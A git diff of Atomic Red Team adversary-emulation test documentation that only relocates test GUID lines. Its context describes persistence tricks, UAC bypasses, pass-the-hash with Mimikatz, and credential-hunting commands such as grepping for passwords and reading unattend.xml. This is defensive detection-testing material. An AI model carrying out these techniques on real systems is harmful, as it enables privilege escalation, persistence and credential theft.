## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes - -auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + + + #### Inputs: @@ -84,13 +86,15 @@ Foreach ($item in $input_table)
## Atomic Test #2 - Replace binary of sticky keys - -auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - Replace sticky keys binary (sethc.exe) with cmd.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 934e90cf-29ca-48b3-863c-411737ad44e3 + + + diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index 4e7b5e57..75e6ea29 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -14,18 +14,20 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s
## Atomic Test #1 - Install AppInit Shim - -auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 - AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls + **Supported Platforms:** Windows +**auto_generated_guid:** a58d9386-3080-4242-ab5f-454c16503d18 + + + #### Inputs: diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md index 6b734da2..d24eac95 100644 --- a/atomics/T1546.011/T1546.011.md +++ b/atomics/T1546.011/T1546.011.md @@ -30,17 +30,19 @@ Utilizing these shims may allow an adversary to perform several malicious acts s
## Atomic Test #1 - Application Shim Installation - -auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 - Install a shim database. This technique is used for privilege escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run the AtomicTest.exe from the \\T1546.011\\bin directory. You should see a message box appear with "Atomic Shim DLL Test!" as defined in the AtomicTest.dll. To better understand what is happening, review the source code files is the \\T1546.011\\src directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + + + #### Inputs: @@ -93,15 +95,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - New shim database files created in the default shim database directory - -auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d - Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + **Supported Platforms:** Windows +**auto_generated_guid:** aefd6866-d753-431f-a7a4-215ca7e3f13d + + + @@ -127,16 +131,18 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -Err
## Atomic Test #3 - Registry key creation and/or modification events for SDB - -auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f - Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing the registry keys that were created. These keys can also be viewed using the Registry Editor. https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + **Supported Platforms:** Windows +**auto_generated_guid:** 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + + + diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index fb65e2d6..b9ab7202 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md @@ -22,13 +22,15 @@ Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniqu
## Atomic Test #1 - IFEO Add Debugger - -auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 - Leverage Global Flags Settings + **Supported Platforms:** Windows +**auto_generated_guid:** fdda2626-5234-4c90-b163-60849a24c0b8 + + + #### Inputs: @@ -58,13 +60,15 @@ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Imag
## Atomic Test #2 - IFEO Global Flags - -auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 - Leverage Global Flags Settings + **Supported Platforms:** Windows +**auto_generated_guid:** 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + + + #### Inputs: diff --git a/atomics/T1546.013/T1546.013.md b/atomics/T1546.013/T1546.013.md index f3f31982..dadf2820 100644 --- a/atomics/T1546.013/T1546.013.md +++ b/atomics/T1546.013/T1546.013.md @@ -16,13 +16,15 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
## Atomic Test #1 - Append malicious start-process cmdlet - -auto_generated_guid: 090e5aa5-32b6-473b-a49b-21e843a56896 - Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 090e5aa5-32b6-473b-a49b-21e843a56896 + + + #### Inputs: diff --git a/atomics/T1546.014/T1546.014.md b/atomics/T1546.014/T1546.014.md index 1c3eea1b..bb146717 100644 --- a/atomics/T1546.014/T1546.014.md +++ b/atomics/T1546.014/T1546.014.md @@ -14,13 +14,15 @@ Adversaries may abuse this service by writing a rule to execute commands when a
## Atomic Test #1 - Persistance with Event Monitor - emond - -auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 - Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 + **Supported Platforms:** macOS +**auto_generated_guid:** 23c9c127-322b-4c75-95ca-eff464906114 + + + #### Inputs: diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 7e20060b..8db87797 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -60,15 +60,17 @@ Adversaries can use these configuration locations to execute malware, such as re
## Atomic Test #1 - Reg Key Run - -auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 - Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** e55be3fd-3521-4610-9d1a-e210e42dcf05 + + + #### Inputs: @@ -97,15 +99,17 @@ REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red T
## Atomic Test #2 - Reg Key RunOnce - -auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb - RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 554cbd88-cde1-4b56-8168-0be552eed9eb + + + #### Inputs: @@ -134,14 +138,16 @@ REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
## Atomic Test #3 - PowerShell Registry RunOnce - -auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 - RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** eb44f842-0457-4ddc-9b92-c4caa144ac42 + + + #### Inputs: @@ -172,15 +178,17 @@ Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ig
## Atomic Test #4 - Suspicious vbs file run from startup Folder - -auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 - vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + + + @@ -208,16 +216,18 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Suspicious jse file run from startup Folder - -auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 - jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** dade9447-791e-4c8f-b04b-3a35855dfa06 + + + @@ -245,15 +255,17 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Suspicious bat file run from startup Folder - -auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e - bat files can be placed in and executed from the startup folder to maintain persistance. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** 5b6768e4-44d2-44f0-89da-a01d1430fd5e + + + @@ -281,13 +293,15 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batsta
## Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder - -auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d - Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. + **Supported Platforms:** Windows +**auto_generated_guid:** 24e55612-85f6-4bd6-ae74-a73d02e3441d + + + diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md index a360c823..da6f3b0d 100644 --- a/atomics/T1547.004/T1547.004.md +++ b/atomics/T1547.004/T1547.004.md @@ -22,15 +22,17 @@ Adversaries may take advantage of these features to repeatedly execute malicious
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell - -auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 - PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + + + #### Inputs: @@ -59,15 +61,17 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell - -auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb - PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + + + #### Inputs: @@ -96,15 +100,17 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell - -auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 - PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** d40da266-e073-4e5a-bb8b-2b385023e5f9 + + + #### Inputs: diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md index f067e1e4..92db61ec 100644 --- a/atomics/T1547.005/T1547.005.md +++ b/atomics/T1547.005/T1547.005.md @@ -12,13 +12,15 @@ The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentC
## Atomic Test #1 - Modify SSP configuration in registry - -auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e - Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. + **Supported Platforms:** Windows +**auto_generated_guid:** afdfd7e3-8a0b-409f-85f7-886fdf249c9e + + + #### Inputs: diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md index 94c10ffe..ca56ae7e 100644 --- a/atomics/T1547.006/T1547.006.md +++ b/atomics/T1547.006/T1547.006.md @@ -16,13 +16,15 @@ Adversaries can use LKMs and kexts to covertly persist on a system and elevate p
## Atomic Test #1 - Linux - Load Kernel Module via insmod - -auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 - This test uses the insmod command to load a kernel module for Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 687dcb93-9656-4853-9c36-9977315e9d23 + + + #### Inputs: diff --git a/atomics/T1547.007/T1547.007.md b/atomics/T1547.007/T1547.007.md index ef96fb9a..bbda29b0 100644 --- a/atomics/T1547.007/T1547.007.md +++ b/atomics/T1547.007/T1547.007.md @@ -14,15 +14,17 @@ An adversary can modify one of these files directly to include a link to their m
## Atomic Test #1 - Re-Opened Applications - -auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba - Plist Method [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 5fefd767-ef54-4ac6-84d3-751ab85e8aba + + + #### Run it with these steps! @@ -44,15 +46,17 @@ or
## Atomic Test #2 - Re-Opened Applications - -auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb - Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + + + #### Inputs: diff --git a/atomics/T1547.009/T1547.009.md b/atomics/T1547.009/T1547.009.md index c36f9fe2..3e405cac 100644 --- a/atomics/T1547.009/T1547.009.md +++ b/atomics/T1547.009/T1547.009.md @@ -14,15 +14,17 @@ Adversaries could use shortcuts to execute their tools for persistence. They may
## Atomic Test #1 - Shortcut Modification - -auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce - This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** ce4fc678-364f-4282-af16-2fb4c78005ce + + + #### Inputs: @@ -53,14 +55,16 @@ del -f #{shortcut_file_path} >nul 2>&1
## Atomic Test #2 - Create shortcut to cmd in startup folders - -auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 - LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" to view the new shortcut. + **Supported Platforms:** Windows +**auto_generated_guid:** cfdc954d-4bb0-4027-875b-a1893ce406f2 + + + diff --git a/atomics/T1547.010/T1547.010.md b/atomics/T1547.010/T1547.010.md index db194c9d..4af13b5c 100644 --- a/atomics/T1547.010/T1547.010.md +++ b/atomics/T1547.010/T1547.010.md @@ -19,13 +19,15 @@ Adversaries can use this technique to load malicious code at startup that will p
## Atomic Test #1 - Add Port Monitor persistence in Registry - -auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + **Supported Platforms:** Windows +**auto_generated_guid:** d34ef297-f178-4462-871e-9ce618d44e50 + + + #### Inputs: diff --git a/atomics/T1547.011/T1547.011.md b/atomics/T1547.011/T1547.011.md index 1056a105..f39ea804 100644 --- a/atomics/T1547.011/T1547.011.md +++ b/atomics/T1547.011/T1547.011.md @@ -14,13 +14,15 @@ A specific plist used for execution at login is com.apple.loginitems.plist
## Atomic Test #1 - Plist Modification - -auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 - Modify MacOS plist file in one of two directories + **Supported Platforms:** macOS +**auto_generated_guid:** 394a538e-09bb-4a4a-95d1-b93cf12682a8 + + + #### Run it with these steps! diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md index 79887ecd..7286cc60 100644 --- a/atomics/T1548.001/T1548.001.md +++ b/atomics/T1548.001/T1548.001.md @@ -18,13 +18,15 @@ Adversaries can use this mechanism on their own malware to make sure they're abl
## Atomic Test #1 - Make and modify binary from C source - -auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 - Make, change owner, and change file attributes on a C source code file + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 896dfe97-ae43-4101-8e96-9a7996555d80 + + + #### Inputs: @@ -59,13 +61,15 @@ sudo rm /tmp/hello.c
## Atomic Test #2 - Set a SetUID flag on file - -auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 - This test sets the SetUID flag on a file in Linux and macOS. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 759055b3-3885-4582-a8ec-c00c9d64dd79 + + + #### Inputs: @@ -96,13 +100,15 @@ sudo rm #{file_to_setuid}
## Atomic Test #3 - Set a SetGID flag on file - -auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c - This test sets the SetGID flag on a file in Linux and macOS. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** db55f666-7cba-46c6-9fe6-205a05c3242c + + + #### Inputs: diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 1d8250bc..81999488 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -34,14 +34,16 @@ Another bypass is possible through some lateral movement techniques if credentia
## Atomic Test #1 - Bypass UAC using Event Viewer (cmd) - -auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 - Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages + **Supported Platforms:** Windows +**auto_generated_guid:** 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 + + + #### Inputs: @@ -71,14 +73,16 @@ reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell) - -auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b - PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages + **Supported Platforms:** Windows +**auto_generated_guid:** a6ce9acf-842a-4af6-8f79-539be7608e2b + + + #### Inputs: @@ -109,14 +113,16 @@ Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
## Atomic Test #3 - Bypass UAC using Fodhelper - -auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 - Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 58f641ea-12e3-499a-b684-44dee46bd182 + + + #### Inputs: @@ -147,14 +153,16 @@ reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell - -auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa - PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 3f627297-6c38-4e7d-a278-fc2563eaaeaa + + + #### Inputs: @@ -186,14 +194,16 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell) - -auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f - PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open + **Supported Platforms:** Windows +**auto_generated_guid:** 3c51abf2-44bf-42d8-9111-dc96ff66750f + + + #### Inputs: @@ -225,14 +235,16 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories - -auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 - Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch + **Supported Platforms:** Windows +**auto_generated_guid:** f7a35090-6f7f-4f64-bb47-d657bf5b10c1 + + + #### Inputs: @@ -264,16 +276,18 @@ del "c:\testbypass.exe" >nul 2>nul
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute - -auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 3be891eb-4608-4173-87e8-78b494c029b7 + + + #### Inputs: @@ -305,14 +319,16 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I
## Atomic Test #8 - Disable UAC using reg.exe - -auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 - Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + **Supported Platforms:** Windows +**auto_generated_guid:** 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + + + @@ -336,9 +352,6 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
## Atomic Test #9 - Bypass UAC using SilentCleanup task - -auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 - Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). @@ -350,9 +363,14 @@ And forcefully run SilentCleanup task: schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + **Supported Platforms:** Windows +**auto_generated_guid:** 28104f8a-4ff1-4582-bcf6-699dce156608 + + + #### Inputs: diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md index 6188a9e6..7e3aeca4 100644 --- a/atomics/T1548.003/T1548.003.md +++ b/atomics/T1548.003/T1548.003.md @@ -22,13 +22,15 @@ In the wild, malware has disabled tty_tickets to potentially make s
## Atomic Test #1 - Sudo usage - -auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e - Common Sudo enumeration methods. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e + + + @@ -50,13 +52,15 @@ sudo vim /etc/sudoers
## Atomic Test #2 - Unlimited sudo cache timeout - -auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc - Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** a7b17659-dd5e-46f7-b7d1-e6792c91d0bc + + + @@ -77,13 +81,15 @@ sudo visudo -c -f /etc/sudoers
## Atomic Test #3 - Disable tty_tickets for sudo caching - -auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 - Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 91a60b03-fb75-4d24-a42e-2eb8956e8de1 + + + diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 1c8d7ebe..d0fc6f04 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -16,14 +16,16 @@ Adversaries may also use stolen password hashes to "overpass the hash." Similar
## Atomic Test #1 - Mimikatz Pass the Hash - -auto_generated_guid: ec23cef9-27d9-46e4-a68d-6f75f7b86908 - Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + **Supported Platforms:** Windows +**auto_generated_guid:** ec23cef9-27d9-46e4-a68d-6f75f7b86908 + + + #### Inputs: @@ -68,13 +70,15 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
## Atomic Test #2 - crackmapexec Pass the Hash - -auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 - command execute with crackmapexec + **Supported Platforms:** Windows +**auto_generated_guid:** eb05b028-16c8-4ad8-adea-6f5b219da9a9 + + + #### Inputs: diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index 4b9d9a7b..b7dff150 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -18,13 +18,15 @@ Adversaries may also create a valid Kerberos ticket using other user information
## Atomic Test #1 - Mimikatz Kerberos Ticket Attack - -auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 - Similar to PTH, but attacking Kerberos + **Supported Platforms:** Windows +**auto_generated_guid:** dbf38128-7ba7-4776-bedf-cc2eed432098 + + + #### Inputs: diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index edb84410..6761c411 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -22,13 +22,15 @@ In cloud and/or containerized environments, authenticated user and service accou
## Atomic Test #1 - Extract Browser and System credentials with LaZagne - -auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 - [LaZagne Source](https://github.com/AlessandroZ/LaZagne) + **Supported Platforms:** macOS +**auto_generated_guid:** 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 + + + @@ -48,13 +50,15 @@ python2 laZagne.py all
## Atomic Test #2 - Extract passwords with grep - -auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 - Extracting credentials from files + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** bd4cf0d1-7646-474e-8610-78ccf5a097c4 + + + #### Inputs: @@ -79,13 +83,15 @@ grep -ri password #{file_path}
## Atomic Test #3 - Extracting passwords with findstr - -auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 - Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0e56bf29-ff49-4ea5-9af4-3b81283fd513 + + + @@ -106,14 +112,16 @@ ls -R | select-string -Pattern password
## Atomic Test #4 - Access unattend.xml - -auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3 - Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process. + **Supported Platforms:** Windows +**auto_generated_guid:** 367d4004-5fc0-446d-823f-960c74ae52c3 + + + @@ -134,13 +142,15 @@ type C:\Windows\Panther\Unattend\unattend.xml
## Atomic Test #5 - Find and Access Github Credentials - -auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803 - This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** da4f751a-020b-40d7-b9ff-d433b7799803 + + + diff --git a/atomics/T1552.002/T1552.002.md b/atomics/T1552.002/T1552.002.md index 4dcc1d70..a4fb96e6 100644 --- a/atomics/T1552.002/T1552.002.md +++ b/atomics/T1552.002/T1552.002.md @@ -17,13 +17,15 @@ Example commands to find Registry keys related to password information: (Citatio
## Atomic Test #1 - Enumeration for Credentials in Registry - -auto_generated_guid: b6ec082c-7384-46b3-a111-9a9b8b14e5e7 - Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** b6ec082c-7384-46b3-a111-9a9b8b14e5e7 + + + @@ -44,14 +46,16 @@ reg query HKCU /f password /t REG_SZ /s
## Atomic Test #2 - Enumeration for PuTTY Credentials in Registry - -auto_generated_guid: af197fd7-e868-448e-9bd5-05d1bcd9d9e5 - Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry entries are found, they will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** af197fd7-e868-448e-9bd5-05d1bcd9d9e5 + + + diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md index eecb4da5..ff2377b5 100644 --- a/atomics/T1552.003/T1552.003.md +++ b/atomics/T1552.003/T1552.003.md @@ -10,13 +10,15 @@
